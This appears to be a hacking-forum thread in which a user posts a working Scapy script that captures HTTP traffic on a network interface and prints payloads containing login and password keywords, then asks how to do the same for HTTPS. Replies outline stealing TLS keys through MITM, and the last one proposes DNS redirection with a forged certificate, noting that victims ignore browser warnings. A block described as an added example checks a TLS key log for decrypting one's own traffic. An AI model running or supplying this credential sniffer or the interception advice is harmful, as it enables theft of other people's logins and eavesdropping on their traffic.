https network sniff
import scapy.all as scapy
from scapy.layers import http
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface', dest = 'interface', help = 'Interface Name for which packet is supposed to be captured.')
    options = parser.parse_args()
   
    if not options.interface:
        parser.error('[-] Please specify the name of the interface, use --help for more info.')
       
    return options.interface
 
def sniffer(interface):
    scapy.sniff(iface = interface, store = False, prn = process_packet)
   
def process_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print('[+] HTTP Requests/URL Requested -> {}'.format(url), '\n')
        cred = get_credentials(packet)
        if cred:
            print('\n\n[+] Possible Credential Information -> {}'.format(cred), '\n\n')

def get_url(packet):
    return (packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path).decode('utf-8')

keywords = ('username', 'uname', 'user', 'login', 'password', 'pass', 'signin', 'signup', 'name')

def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        field_load = packet[scapy.Raw].load.decode('utf-8')
        for keyword in keywords:
            if keyword in field_load:
                return field_load
             
interface = get_args()
sniffer(interface)

So this is an HTTP sniffer, but I want to sniff some HTTPS packets. Can anyone help me with that?
Then I want to decrypt those logs using Wireshark. Possible?
Reply
Where do you want to run this code? :D

Sniffing HTTPS is possible thanks to other ways like these: https://confluence.atlassian.com/kb/how-to-capture-http-traffic-using-wireshark-fiddler-or-tcpdump-779164332.html
Reply
(September 8, 2022, 08:01 PM)arishsingh07 Wrote:
import scapy.all as scapy
from scapy.layers import http
import argparse

def get_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i', '--interface', dest = 'interface', help = 'Interface Name for which packet is supposed to be captured.')
    options = parser.parse_args()
   
    if not options.interface:
        parser.error('[-] Please specify the name of the interface, use --help for more info.')
       
    return options.interface
 
def sniffer(interface):
    scapy.sniff(iface = interface, store = False, prn = process_packet)
   
def process_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print('[+] HTTP Requests/URL Requested -> {}'.format(url), '\n')
        cred = get_credentials(packet)
        if cred:
            print('\n\n[+] Possible Credential Information -> {}'.format(cred), '\n\n')

def get_url(packet):
    return (packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path).decode('utf-8')

keywords = ('username', 'uname', 'user', 'login', 'password', 'pass', 'signin', 'signup', 'name')

def get_credentials(packet):
    if packet.haslayer(scapy.Raw):
        field_load = packet[scapy.Raw].load.decode('utf-8')
        for keyword in keywords:
            if keyword in field_load:
                return field_load
             
interface = get_args()
sniffer(interface)

So this is an HTTP sniffer, but I want to sniff some HTTPS packets. Can anyone help me with that?
Then I want to decrypt those logs using Wireshark. Possible?


It's called HTTP(S) for a reason; with current security it's quite hard to achieve. You could try to do a MITM attack to steal the key, but I doubt today's browsers wouldn't notice it. But if you're trying to decrypt your own packets, then sure, it's easy because you've got the key to decrypt it yourself.
Reply
You have to identify the session key exchange and decrypt that with the private key then use that to decrypt the rest of the data in the stream.

If it's using TLS 1.3 (use of Ephemeral Diffie-Hellman based key exchange), you'll have to own the client and the server.

With lower SSL/TLS versions you'll need the server RSA private key used during the key exchange.
Reply
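For the case raised in the replies above, decrypting your own traffic, a client that supports the SSLKEYLOGFILE convention writes per-session secrets to an NSS-format key log that Wireshark can load. The following is an added example, not code from any poster in this thread: it checks such a key log for the secrets each session needs. The function names and the sample values are assumptions constructed for illustration, and the example treats a TLS 1.3 session as complete only when all four handshake and traffic secrets are present.

```python
# Added example: sanity-check an NSS-format key log before loading it in Wireshark.
import re
from collections import defaultdict

# Labels a TLS 1.3 session normally logs for handshake and application data.
TLS13_LABELS = {
    "CLIENT_HANDSHAKE_TRAFFIC_SECRET", "SERVER_HANDSHAKE_TRAFFIC_SECRET",
    "CLIENT_TRAFFIC_SECRET_0", "SERVER_TRAFFIC_SECRET_0",
}
# <LABEL> <client random, 32 bytes as hex> <secret as hex>
LINE_RE = re.compile(r"^([A-Z0-9_]+) ([0-9a-fA-F]{64}) ([0-9a-fA-F]+)$")

def parse_keylog(text):
    """Group logged secrets by client random."""
    sessions = defaultdict(dict)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # comments, blank lines and malformed lines are skipped
            label, client_random, secret = m.groups()
            sessions[client_random.lower()][label] = secret.lower()
    return dict(sessions)

def check_sessions(text):
    """Return {client_random: (version, complete, missing_labels)}."""
    report = {}
    for client_random, secrets in parse_keylog(text).items():
        if "CLIENT_RANDOM" in secrets:
            # TLS 1.2 and earlier: one 48-byte master secret per session.
            complete = len(secrets["CLIENT_RANDOM"]) == 96
            report[client_random] = ("TLS<=1.2", complete, [])
        else:
            missing = sorted(TLS13_LABELS - set(secrets))
            report[client_random] = ("TLS1.3", not missing, missing)
    return report

# Constructed sample, not real key material.
SAMPLE = "\n".join([
    "# key log written by my own client",
    f"CLIENT_RANDOM {'a1' * 32} {'0b' * 48}",
    f"CLIENT_HANDSHAKE_TRAFFIC_SECRET {'c2' * 32} {'1d' * 32}",
    f"SERVER_HANDSHAKE_TRAFFIC_SECRET {'c2' * 32} {'2e' * 32}",
    f"CLIENT_TRAFFIC_SECRET_0 {'c2' * 32} {'3f' * 32}",
    "not a key log line",
])

if __name__ == "__main__":
    for cr, (version, complete, missing) in check_sessions(SAMPLE).items():
        print(cr[:16], version, "complete" if complete else f"missing {missing}")
```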
Good luck with that, but maybe it helps if you deep dive into the crypto details of TLS... then you should know what to do for the most current version and "just" find a way to get the private key... (heart still bleeding? :D)
Reply
thanks
Reply
You have to get a private key to decrypt HTTPS, or maybe you can redirect all the traffic between your DNS and use your own certificate. The browser obv will warn the victim, but most of the time people just click without reading, so..
Reply